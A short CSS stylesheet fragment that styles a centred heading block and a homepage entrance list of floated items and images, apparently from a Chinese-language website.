.nyxqy2-zx{line-height:2.5em;border-bottom:1px dashed #d1d1d1;margin-bottom:10px;}
.nyxqy2-zx h2{text-align:center;font-size:36px;line-height:50px;height:50px;}

/*首页入口*/
.rk{margin-bottom:30px;}
.rk ul{text-align:center;}
.rk ul li{float:left;width:400px;}
.rk ul li img{width:300px;}